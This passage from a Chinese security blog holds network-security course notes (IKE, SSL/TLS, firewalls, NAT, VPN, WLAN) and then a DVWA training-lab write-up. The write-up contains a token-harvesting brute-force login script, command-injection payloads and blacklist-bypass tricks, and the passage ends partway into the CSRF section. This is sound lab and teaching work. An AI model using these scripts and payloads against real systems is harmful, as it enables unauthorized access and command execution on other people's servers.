title="第四章:IPSec-IKE"></a>第四章:IPSec-IKE</h3><p>因特网密钥交换协议,是一个以受保护的方式<strong>动态协商IPsec SA</strong>的协议。</p><p>功能:使用某种<strong>长期密钥</strong>进行双向认证并建立<strong>会话密钥</strong></p><p>主模式,野蛮模式。</p><p> IKEv1, IKEv2</p><h3 id="第五章:SSL-x2F-TLS基本协议"><a href="#第五章:SSL-x2F-TLS基本协议" class="headerlink" title="第五章:SSL/TLS基本协议"></a>第五章:SSL/TLS基本协议</h3><p>SSL (Secure Socket Layer)是一种在TCP协议之上为两个端实体(End Entity)之间提供安全通道的协议。</p><p>具有保护传输数据以及识别通信实体的功能。安全通道是透明的,独立于应用层;传输层采用TCP,提供可靠业务</p><p>SSL功能:</p><ul><li>客户对服务器的身份认证</li><li>服务器对客户的身份认证</li><li>建立服务器与客户之间安全的数据通道</li></ul><p>SSL工作原理:</p><ul><li>采用握手协议建立客户与服务器之间的安全通道,该协议包括双方的相互认证,交换密钥参数</li><li>采用告警协议向对端指示其安全错误</li><li>采用改变密码规格协议告知改变密码参数</li><li>采用记录协议封装以上三种协议或应用层数据</li></ul><h3 id="第六章:防火墙与NAT"><a href="#第六章:防火墙与NAT" class="headerlink" title="第六章:防火墙与NAT"></a>第六章:防火墙与NAT</h3><p>1.定义 防火墙是位于两个(或多个)网络间,实施网间访问控制的一组组件的集合</p><p>防火墙 = 硬件 + 软件 + 控制策略</p><p>设计目标:</p><ul><li>内部和外部之间的所有网络数据流必须经过防火墙;</li><li>只有符合安全政策的数据流才能通过防火墙;</li><li>防火墙自身能抗攻击;</li></ul><p>防火墙的必要性:</p><ul><li>保护内部不受来自Internet的攻击</li><li>创建安全域</li><li>强化机构安全策略</li></ul><p>防火墙的要求(两个要求存在矛盾性):</p><ul><li>保障内部网安全</li><li>保证内部网同外部网的连通</li></ul><p>2.分类</p><p>包过滤型防火墙</p><p>针对包过滤型防火墙的攻击</p><p>状态检测型防火墙(参见百度百科)</p><p>状态检测防火墙在网络层有一个检查引擎截获数据包并抽取出与应用层状态有关的信息,并以此为依据决定对该连接是接受还是拒绝。</p><p>应用级网关型防火墙</p><p>代理服务型防火墙</p><p>复合型防火墙</p><p>安全缺省策略:</p><ul><li><p>一切未被禁止的就是允许的</p></li><li><p>一切未被允许的就是禁止的(RFC2979推荐)</p></li></ul><p>3.功能</p><ul><li>访问控制:隔断、过滤、代理</li><li>加密</li><li>授权认证</li><li>地址翻译(NAT)</li><li>VPN</li><li>负载均衡</li><li>内容安全:病毒扫描(特征码)、URL扫描、HTTP过滤</li><li>日志记帐、审计报警</li></ul><p>4.NAT 基本原理、作用</p><p>Network Address Translation</p><p>NAT技术可以在路由器(边界)、防火墙上实现内外地址的翻译工作</p><p>类型:</p><ul><li>源网络地址转换(Source NAT,缩写为SNAT),即IP伪装(masquerade)</li><li>目的网络地址转换(Destination NAT,缩写为DNAT)</li></ul><p>作用:</p><p>SNAT</p><ul><li>复用内部的全局地址,解缓IP地址不足的压力</li><li>向外部网络隐藏内部网络的IP地址</li></ul><p>DNAT</p><ul><li>在实现SNAT的环境下进行有效的服务访问</li><li>流量均衡</li></ul><p>NAT工作原理:</p><p>SNAT工作原理</p><p>实现方式:</p><ul><li>静态NAT(一一对应)</li><li>动态NAT(多对多)</li><li>过载(一对多)</li></ul><h3 id="第七章:虚拟专用网VPN"><a href="#第七章:虚拟专用网VPN" class="headerlink" title="第七章:虚拟专用网VPN"></a>第七章:虚拟专用网VPN</h3><p>所需技术:</p><ul><li>隧道技术</li><li>加解密技术</li><li>密钥管理技术</li><li>认证技术</li><li>访问控制</li></ul><p>分类:</p><img src="https://s2.loli.net/2022/02/04/V4UZSWYbT3NICLO.png" alt="image-20210916203559024" style="zoom: 50%;" /><p>IPSec VPN </p><ul><li>AH 协议提供信息源验证和完整性保证;</li><li>ESP 协议提供信息源验证、机密性和完整性保证;</li><li>IKE提供密钥协商</li></ul><h3 id="第八章:应用层安全协议"><a href="#第八章:应用层安全协议" class="headerlink" title="第八章:应用层安全协议"></a>第八章:应用层安全协议</h3><p>电子邮件安全协议:</p><ul><li>PEM</li><li>S/MIME</li><li>PGP</li><li>SMTP</li></ul><p><img src="https://s2.loli.net/2022/02/04/vBzk5jb3mchOQW9.png" alt="image-20210916204440621"></p><p>签名、压缩、加密</p><p>若超过标准长度,则PGP自动对报文分段,接收端再重组。</p><p>PGP虽然采用公钥密码体系,但不是基于PKI证书体系</p><p>S/MIME使用X.509证书,它的密钥管理方案介于严格的X.509证书层次结构和PGP信任网之间</p><p>SSH</p><p>HTTPS((http over SSL)</p><p>安全电子交易协议SET(Secure Electronic Transaction)</p><p>SET提供了消费者、商家和银行之间的认证,确保了网上交易数据的保密性,数据的完整性以及交易的不可抵赖性。</p><p>SET采用公钥密码体制,遵循X.509数字证书标准</p><p>双重数字签名</p><h3 id="第九章:无线局域网安全"><a href="#第九章:无线局域网安全" class="headerlink" title="第九章:无线局域网安全"></a>第九章:无线局域网安全</h3><p>1.无线网络的分类</p><ul><li>无线广域网(WWAN)</li><li>无线城域网(WMAN)</li><li>无线局域网(WLAN)Wireless Local Area Network</li><li>无线个人网(WPAN)</li></ul><p>2.WLAN建立的方式</p><ul><li>Ad-hoc Mode</li><li>Infrastructure Mode</li></ul><p>3.WLAN的安全需求</p><p>WLAN安全机制</p><ul><li>用户认证</li><li>用户授权</li><li>数据安全</li></ul><p>802.11 的安全机制</p><ul><li>身份认证</li><li>数据机密性</li><li>数据完整性</li></ul><p>WEP协议(有线等效保密协议)</p><p>功能:访问控制,数据保密性</p><p>802.11的安全增强</p><img src="https://s2.loli.net/2022/02/04/TXoBc2NfMj16ls7.png" alt="image-20210917091147265" style="zoom:67%;" /><img src="https://s2.loli.net/2022/02/04/SWRCJfDHQzj5VEN.png" alt="image-20210917092310657" style="zoom:67%;" /><h3 id="其他"><a href="#其他" class="headerlink" title="其他"></a>其他</h3><p>安全机制实现安全服务,安全服务抵御安全攻击。</p><img src="https://s2.loli.net/2022/02/04/XkBRKT8uEWjYpnN.png" alt="image-20211217161559825" style="zoom:67%;" /><p>防火墙设计目标:</p><ul><li>内部和外部之间的所有网络数据流必须经过防火墙;</li><li>只有符合安全政策的数据流才能通过防火墙;</li><li>防火墙自身能抗攻击;</li></ul><p>防火墙的控制能力:</p><ul><li>服务控制</li><li>方向控制</li><li>用户控制</li><li>行为控制</li></ul><p>包过滤防火墙在(网络层)上进行检测,在(路由器)上实现。</p><img src="https://s2.loli.net/2022/02/04/1i7PEv6InzcfU9h.png" alt="image-20211219145112895" style="zoom:67%;" /><p>IKE的功能:使用某种<strong>长期密钥</strong>进行双向认证并建立<strong>会话密钥</strong></p><p>IKE是一个是一个以受保护的方式<strong>动态协商IPsec SA</strong>的协议</p><img src="https://s2.loli.net/2022/02/04/7vSJnH9fz1mwtFy.png" alt="image-20211219154048173" style="zoom:67%;" /><img src="https://s2.loli.net/2022/02/04/F1E85HSVDLQMobq.png" alt="image-20211219160229356" style="zoom:67%;" /><p>选择符。</p><p><img src="https://s2.loli.net/2022/02/04/tAloZHvfS6DFyTq.png" alt="image-20211219161713558"></p><p>电子邮件安全协议</p><ul><li>PEM</li><li>S/MIME</li><li>PGP</li></ul><p><img src="https://s2.loli.net/2022/02/04/ob7WaATp9jD5OBJ.png" alt="image-20211219165020483"></p><p><img src="https://s2.loli.net/2022/02/04/aZBoRKhuwN5xQvr.png" alt="image-20211219181615499"></p><img src="https://s2.loli.net/2022/02/04/TJRdrDHY1jazyQM.png" alt="image-20211219184746390" style="zoom: 50%;" /><img src="https://s2.loli.net/2022/02/04/ONRy2mrbdkYZuIa.png" alt="image-20211219190204120" style="zoom:67%;" /><p><img src="https://s2.loli.net/2022/02/04/mxIhQ7VDeK31Wda.png" alt="image-20211219191438417"></p><img src="https://s2.loli.net/2022/02/04/MpsmP5i9QUWXTA2.png" alt="image-20211219200652506" style="zoom:67%;" /><p>WEP:有线等效保密协议</p><p>WEP功能:</p><ul><li>访问控制</li><li>数据保密性</li></ul><img src="https://s2.loli.net/2022/02/04/yu2oqjXaIC6dmQE.png" alt="image-20211220155923021" style="zoom:67%;" /><p><img src="https://s2.loli.net/2022/02/04/HLapO6CK7EF8kUd.png" alt="image-20211220163158572"></p>]]></content>
<categories>
<category> 安全 </category>
</categories>
</entry>
<entry>
<title>DVWA靶场记录</title>
<link href="/2022/01/22/DVWA/"/>
<url>/2022/01/22/DVWA/</url>
<content type="html"><![CDATA[<blockquote><p>二月份做过一遍,现在复习一下。</p></blockquote><h3 id="暴力破解"><a href="#暴力破解" class="headerlink" title="暴力破解"></a>暴力破解</h3><p><strong>1.low</strong></p><p><img src="https://s2.loli.net/2022/01/27/H8ZeliAm4b7Et9B.png" alt="image-20220127105718016"></p><p>发送到Intruder模块破解即可。</p><p><img src="https://s2.loli.net/2022/01/27/szY9CNKSuaX8QB2.png" alt="image-20220127110040408"></p><p>或者使用万能密码登陆</p><p><img src="https://s2.loli.net/2022/01/27/93df8gNjkeHr7bF.png" alt="image-20220127110633591"></p><p><strong>2.medium</strong></p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>( <span class="keyword">isset</span>( <span class="variable">$_GET</span>[ <span class="string">'Login'</span> ] ) ) {</span><br><span class="line"> <span class="comment">// Sanitise username input</span></span><br><span class="line"> <span class="variable">$user</span> = <span class="variable">$_GET</span>[ <span class="string">'username'</span> ];</span><br><span class="line"> <span class="variable">$user</span> = <span class="title function_ invoke__">mysql_real_escape_string</span>( <span class="variable">$user</span> );</span><br><span class="line"></span><br><span class="line"> <span class="comment">// Sanitise password input</span></span><br><span class="line"> <span class="variable">$pass</span> = <span class="variable">$_GET</span>[ <span class="string">'password'</span> ];</span><br><span class="line"> <span class="variable">$pass</span> = <span class="title function_ invoke__">mysql_real_escape_string</span>( <span class="variable">$pass</span> );</span><br><span class="line"> <span class="variable">$pass</span> = <span class="title function_ invoke__">md5</span>( <span class="variable">$pass</span> );</span><br><span class="line"></span><br><span class="line"> <span class="comment">// Check the database</span></span><br><span class="line"> <span class="variable">$query</span> = <span class="string">"SELECT * FROM `users` WHERE user = '<span class="subst">$user</span>' AND password = '<span class="subst">$pass</span>';"</span>;</span><br><span class="line"> <span class="variable">$result</span> = <span class="title function_ invoke__">mysql_query</span>( <span class="variable">$query</span> ) <span class="keyword">or</span> <span class="keyword">die</span>( <span class="string">'<pre>'</span> . <span class="title function_ invoke__">mysql_error</span>() . <span class="string">'</pre>'</span> );</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>( <span class="variable">$result</span> && <span class="title function_ invoke__">mysql_num_rows</span>( <span class="variable">$result</span> ) == <span class="number">1</span> ) {</span><br><span class="line"> <span class="comment">// Get users details</span></span><br><span class="line"> <span class="variable">$avatar</span> = <span class="title function_ invoke__">mysql_result</span>( <span class="variable">$result</span>, <span class="number">0</span>, <span class="string">"avatar"</span> );</span><br><span class="line"></span><br><span class="line"> <span class="comment">// Login successful</span></span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"<p>Welcome to the password protected area <span class="subst">{$user}</span></p>"</span>;</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"<img src=\"<span class="subst">{$avatar}</span>\" />"</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">else</span> {</span><br><span class="line"> <span class="comment">// Login failed</span></span><br><span class="line"> <span class="title function_ invoke__">sleep</span>( <span class="number">2</span> );</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"<pre><br />Username and/or password incorrect.</pre>"</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="title function_ invoke__">mysql_close</span>();</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="meta">?></span> </span><br></pre></td></tr></table></figure><p><img src="https://s2.loli.net/2022/01/27/TDGXZRB9kpgJq14.png" alt="image-20220127111122668"></p><p>这个函数对特殊字符进行转义,使得万能密码失效,只能用暴力破解的方法了。</p><p><strong>3.high</strong></p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Check Anti-CSRF token</span></span><br><span class="line"><span class="title function_ invoke__">checkToken</span>( <span class="variable">$_REQUEST</span>[ <span class="string">'user_token'</span> ], <span class="variable">$_SESSION</span>[ <span class="string">'session_token'</span> ], <span class="string">'index.php'</span> );</span><br></pre></td></tr></table></figure><p>Token直接并到URL后面。</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://150.158.167.184:81/vulnerabilities/brute/?username=admin&password=password&Login=Login&user_token=2f7c77f2d6684f968502e34a49b71c39#</span><br></pre></td></tr></table></figure><p>使用脚本进行爆破</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> bs4 <span class="keyword">import</span> BeautifulSoup</span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line">header={</span><br><span class="line"> <span class="string">'GET'</span>: <span class="string">'http://150.158.167.184:81/vulnerabilities/brute/ HTTP/1.1'</span>,</span><br><span class="line"> <span class="string">'User-Agent'</span>:<span class="string">'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0'</span>,</span><br><span class="line"> <span class="string">'Accept'</span>:<span class="string">'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8'</span>,</span><br><span class="line"> <span class="string">'Accept-Language'</span>:<span class="string">'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2'</span>,</span><br><span class="line"> <span class="string">'Referer'</span>:<span class="string">'http://150.158.167.184:81/vulnerabilities/brute/'</span>,</span><br><span class="line"> <span class="string">'cookie'</span>:<span class="string">'PHPSESSID=ukih93al6mi9q6sghlo6oo5h90; security=high'</span>,</span><br><span class="line"> <span class="string">'Connection'</span>:<span class="string">'keep-alive'</span>,</span><br><span class="line"> <span class="string">'Upgrade-Insecure-Requests'</span>:<span class="string">'1'</span>,</span><br><span class="line"> <span class="string">'Host'</span>:<span class="string">'127.0.0.1'</span></span><br><span class="line"> }</span><br><span class="line">requrl=<span class="string">"http://150.158.167.184:81/vulnerabilities/brute/"</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">get_token</span>(<span class="params">requrl,header</span>):</span><br><span class="line"> response=requests.get(url=requrl,headers=header)</span><br><span class="line"> <span class="built_in">print</span> (response.status_code,<span class="built_in">len</span>(response.content))</span><br><span class="line"> soup=BeautifulSoup(response.text,<span class="string">"html.parser"</span>)</span><br><span class="line"> <span class="built_in">input</span>=soup.form.select(<span class="string">"input[type='hidden']"</span>) <span class="comment">#返回的是一个list列表</span></span><br><span class="line"> user_token=<span class="built_in">input</span>[<span class="number">0</span>][<span class="string">'value'</span>] <span class="comment">#获取用户的token</span></span><br><span class="line"> <span class="keyword">return</span> user_token</span><br><span class="line"></span><br><span class="line">user_token=get_token(requrl,header)</span><br><span class="line">i=<span class="number">0</span></span><br><span class="line"><span class="keyword">for</span> line <span class="keyword">in</span> <span class="built_in">open</span>(<span class="string">"password.txt"</span>):</span><br><span class="line"> requrl=<span class="string">"http://150.158.167.184:81/vulnerabilities/brute/?username=admin&password="</span>+line.strip()+<span class="string">"&Login=Login&user_token="</span>+user_token</span><br><span class="line"> i=i+<span class="number">1</span></span><br><span class="line"> <span class="built_in">print</span> (i , <span class="string">'admin'</span> ,line.strip(),end=<span class="string">" "</span>)</span><br><span class="line"> user_token=get_token(requrl,header)</span><br><span class="line"> <span class="comment"># 尝试次数</span></span><br><span class="line"> <span class="keyword">if</span>(i==<span class="number">20</span>):</span><br><span class="line"> <span class="keyword">break</span></span><br></pre></td></tr></table></figure><p><img src="https://s2.loli.net/2022/01/27/A4ROEJq7lrXxk1w.png" alt="image-20220127114525285"></p><h3 id="命令注入"><a href="#命令注入" class="headerlink" title="命令注入"></a>命令注入</h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"><span class="meta"><?php</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>( <span class="keyword">isset</span>( <span class="variable">$_POST</span>[ <span class="string">'Submit'</span> ] ) ) {</span><br><span class="line"> <span class="comment">// Get input</span></span><br><span class="line"> <span class="variable">$target</span> = <span class="variable">$_REQUEST</span>[ <span class="string">'ip'</span> ];</span><br><span class="line"></span><br><span class="line"> <span class="comment">// Determine OS and execute the ping command.</span></span><br><span class="line"> <span class="keyword">if</span>( <span class="title function_ invoke__">stristr</span>( <span class="title function_ invoke__">php_uname</span>( <span class="string">'s'</span> ), <span class="string">'Windows NT'</span> ) ) {</span><br><span class="line"> <span class="comment">// Windows</span></span><br><span class="line"> <span class="variable">$cmd</span> = <span class="title function_ invoke__">shell_exec</span>( <span class="string">'ping '</span> . <span class="variable">$target</span> );</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">else</span> {</span><br><span class="line"> <span class="comment">// *nix</span></span><br><span class="line"> <span class="variable">$cmd</span> = <span class="title function_ invoke__">shell_exec</span>( <span class="string">'ping -c 4 '</span> . <span class="variable">$target</span> );</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="comment">// Feedback for the end user</span></span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"<pre><span class="subst">{$cmd}</span></pre>"</span>;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><p><strong>1.Low</strong></p><p>没有任何防护,可以直接执行命令:<code>127.0.0.1 && ipconfig</code></p><p><strong>2.medium</strong></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">命令1 && 命令2 表示先执行命令1,成功后接着执行命令2。</span><br><span class="line">命令1 || 命令2 表示先执行命令1,不成功再执行命令2,命令1执行成功,则不再执行命令2。</span><br></pre></td></tr></table></figure><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line">1、“;”分隔符</span><br><span class="line">用分号分隔的命令会按顺序执行,即使中间命令使用方式不对,会有相关错误输出,后面的命令照样会执行。如:</span><br><span class="line"></span><br><span class="line">输入:命令A;命令B;命令C</span><br><span class="line"></span><br><span class="line">按顺序执行A、B、C命令,若B命令调用方式不对,终端会有相关错误提示,提示后会继续执行C命令。</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">2、“&&”分隔符</span><br><span class="line">同C、C++语言逻辑运算符"&&"类似,遇到首个命令执行失败后,后面的命令不会执行。如:</span><br><span class="line"></span><br><span class="line">输入:命令A && 命令B && 命令C</span><br><span class="line"></span><br><span class="line">先执行命令A,若A命令执行正确则再执行命令B。假如命令B执行失败,则停止,C命令不会被执行到。</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">3、“||”分隔符</span><br><span class="line">同C、C++语言逻辑运算符"||"类似,遇到首个命令执行成功后,后面的命令不会执行。如:</span><br><span class="line"></span><br><span class="line">输入:命令A || 命令B || 命令C</span><br><span class="line"></span><br><span class="line">先执行命令A,若A命令执行失败则再执行命令B。假如命令B执行成功,则停止,C命令不会被执行到。</span><br></pre></td></tr></table></figure><p>用黑名单的形势过滤了‘&&’和’;’命令连接符。</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Set blacklist</span></span><br><span class="line"><span class="variable">$substitutions</span> = <span class="keyword">array</span>(</span><br><span class="line"> <span class="string">'&&'</span> => <span class="string">''</span>,</span><br><span class="line"> <span class="string">';'</span> => <span class="string">''</span>,</span><br><span class="line">);</span><br></pre></td></tr></table></figure><p>此时,可以只使用’&’来进行命令注入。</p><p><img src="https://s2.loli.net/2022/01/22/TYoIfNFdB2n7DgJ.png" alt="image-20220122114355231"></p><p><strong>3.high</strong></p><p>对很多符号都进行了黑名单限制</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Set blacklist</span></span><br><span class="line"><span class="variable">$substitutions</span> = <span class="keyword">array</span>(</span><br><span class="line"> <span class="string">'&'</span> => <span class="string">''</span>,</span><br><span class="line"> <span class="string">';'</span> => <span class="string">''</span>,</span><br><span class="line"> <span class="string">'| '</span> => <span class="string">''</span>,</span><br><span class="line"> <span class="string">'-'</span> => <span class="string">''</span>,</span><br><span class="line"> <span class="string">'$'</span> => <span class="string">''</span>,</span><br><span class="line"> <span class="string">'('</span> => <span class="string">''</span>,</span><br><span class="line"> <span class="string">')'</span> => <span class="string">''</span>,</span><br><span class="line"> <span class="string">'`'</span> => <span class="string">''</span>,</span><br><span class="line"> <span class="string">'||'</span> => <span class="string">''</span>,</span><br><span class="line">);</span><br></pre></td></tr></table></figure><p>但其中有一处细节,’| ‘后面有空格,只过滤了有空格的|命令,此时可以通过无空格的’|’来进行命令注入。</p><p><strong>4.impossible</strong></p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Get input</span></span><br><span class="line"><span class="variable">$target</span> = <span class="variable">$_REQUEST</span>[ <span class="string">'ip'</span> ];</span><br><span class="line"><span class="variable">$target</span> = <span class="title function_ invoke__">stripslashes</span>( <span class="variable">$target</span> );</span><br><span class="line"></span><br><span class="line"><span class="comment">// Split the IP into 4 octects</span></span><br><span class="line"><span class="variable">$octet</span> = <span class="title function_ invoke__">explode</span>( <span class="string">"."</span>, <span class="variable">$target</span> );</span><br><span class="line"></span><br><span class="line"><span class="comment">// Check IF each octet is an integer</span></span><br><span class="line"><span class="keyword">if</span>( ( <span class="title function_ invoke__">is_numeric</span>( <span class="variable">$octet</span>[<span class="number">0</span>] ) ) && ( <span class="title function_ invoke__">is_numeric</span>( <span class="variable">$octet</span>[<span class="number">1</span>] ) ) && ( <span class="title function_ invoke__">is_numeric</span>( <span class="variable">$octet</span>[<span class="number">2</span>] ) ) && ( <span class="title function_ invoke__">is_numeric</span>( <span class="variable">$octet</span>[<span class="number">3</span>] ) ) && ( <span class="title function_ invoke__">sizeof</span>( <span class="variable">$octet</span> ) == <span class="number">4</span> ) ) {</span><br><span class="line"> <span class="comment">// If all 4 octets are int's put the IP back together.</span></span><br><span class="line"> <span class="variable">$target</span> = <span class="variable">$octet</span>[<span class="number">0</span>] . <span class="string">'.'</span> . <span class="variable">$octet</span>[<span class="number">1</span>] . <span class="string">'.'</span> . <span class="variable">$octet</span>[<span class="number">2</span>] . <span class="string">'.'</span> . <span class="variable">$octet</span>[<span class="number">3</span>];</span><br><span class="line"></span><br><span class="line"> <span class="comment">// Determine OS and execute the ping command.</span></span><br><span class="line"> <span class="keyword">if</span>( <span class="title function_ invoke__">stristr</span>( <span class="title function_ invoke__">php_uname</span>( <span class="string">'s'</span> ), <span class="string">'Windows NT'</span> ) ) {</span><br><span class="line"> <span class="comment">// Windows</span></span><br><span class="line"> <span class="variable">$cmd</span> = <span class="title function_ invoke__">shell_exec</span>( <span class="string">'ping '</span> . <span class="variable">$target</span> );</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">else</span> {</span><br><span class="line"> <span class="comment">// *nix</span></span><br><span class="line"> <span class="variable">$cmd</span> = <span class="title function_ invoke__">shell_exec</span>( <span class="string">'ping -c 4 '</span> . <span class="variable">$target</span> );</span><br><span class="line"> }</span><br></pre></td></tr></table></figure><p>impossible也就是防护方法,通过对ip地址分片,对四个部分进行检查,判断是否都是数字。这样就可以从逻辑上防止命令注入。</p><h3 id="CSRF"><a href="#CSRF" class="headerlink" title="CSRF"></a>CSRF</h3><p><img src="https://s2.loli.net/2022/01/22/nbIjUsiz54XtHyx.jpg" alt="img"></p><p>原理:攻击者利用目标用户的身份,以目标用户的名义执行非法操作</p><ul><li>目标用户已经登陆了网站,能够执行网站的操作</li><li>目标用户访问了攻击者构造的URL</li></ul><p>源代码如下:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"><span class="meta"><?php</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>( <span class="keyword">isset</span>( <span class="variable">$_GET</span>[ <span class="string">'Change'</span> ] ) ) {</span><br><span class="line"> <span class="comment">// Get input</span></span><br><span class="line"> <span class="variable">$pass_new</span> = <span class="variable">$_GET</span>[ <span class="string">'password_new'</span> ];</span><br><span class="line"> <span class="variable">$pass_conf</span> = <span class="variable">$_GET</span>[ <span class="string">'password_conf'</span> ];</span><br><span class="line"></span><br><span class="line"> <span class="comment">// Do the passwords match?</span></span><br><span class="line"> <span class="keyword">if</span>( <span class="variable">$pass_new</span> == <span class="variable">$pass_conf</span> ) {</span><br><span class="line"> <span class="comment">// They do!</span></span><br><span class="line"> <span class="variable">$pass_new</span> = ((<span class="keyword">isset</span>(<span class="variable">$GLOBALS</span>[<span class="string">"___mysqli_ston"</span>]) && <span class="title function_ invoke__">is_object</span>(<span class="variable">$GLOBALS</span>[<span class="string">"___mysqli_ston"</span>])) ? <span class="title function_ invoke__">mysqli_real_escape_string</span>(<span class="variable">$GLOBALS</span>[<span class="string">"___mysqli_ston"</span>], <span class="variable">$pass_new</span> ) : ((<span class="title function_ invoke__">trigger_error</span>(<span class="string">"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work."</span>, E_USER_ERROR)) ? <span class="string">""</span> : <span class="string">""</span>));</span><br><span class="line"> <span class="variable">$pass_new</span> = <span class="title function_ 